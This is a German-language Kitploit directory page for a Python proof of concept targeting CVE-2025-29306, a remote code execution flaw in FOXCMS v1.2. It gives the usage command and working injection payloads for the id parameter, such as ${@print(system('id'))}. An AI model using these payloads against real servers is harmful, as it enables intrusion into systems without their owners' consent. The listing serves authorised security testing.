Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
FOXCMS-CVE-2025-29306-POC — Python PoC für CVE-2025-29306, eine Parameter-Injection-RCE in FOXCMS v1.2. Injiziert PHP-Code über den id-Parameter auf /images/index.html für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/inok009/foxcms-cve-2025-29306-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubinok009/foxcms-cve-2025-29306-poc

FOXCMS-CVE-2025-29306-POC

Python PoC für CVE-2025-29306, eine Parameter-Injection-RCE in FOXCMS v1.2. Injiziert PHP-Code über den id-Parameter auf /images/index.html für autorisierte Sicherheitstests.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 1 JahrNoch nicht geprüft

FOXCMS Parameterinjektion RCE – CVE-2025-29306

Dieses Repository enthält einen Python-basierten PoC für eine Remote Code Execution (RCE)-Schwachstelle, die FOXCMS v1.2 betrifft, ein chinesisches Open-Source-Content-Management-System.

CVE-ID: CVE-2025-29306
Betrifft: FOXCMS v1.2
Typ: Service Parameter Injection → Code Execution


Zusammenfassung der Schwachstelle

FOXCMS leidet unter einem unsicheren Parameter-Parsing-Mechanismus im id-Parameter auf dem Endpunkt /images/index.html. Dies ermöglicht die Injektion von Payloads mittels ${@print()}-Ausdrücken, was zur PHP-Codeausführung führt.


PoC-Verwendung

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek
root@kitploit:~
pip install requests

# Usage 
python foxcms_poc.py http://target.com/images/index.html?id=

# The script uses payloads like:

${@print(phpinfo())}
${@print(system('id'))}

🔐 Rechtlicher Hinweis

Dieser Code dient ausschließlich zu Bildungszwecken und autorisierten Sicherheitstests. Verwenden Sie ihn NICHT auf Systemen, die Sie nicht besitzen oder für die Sie keine Berechtigung zum Testen haben.

Autor Inok009

Tool herunterladen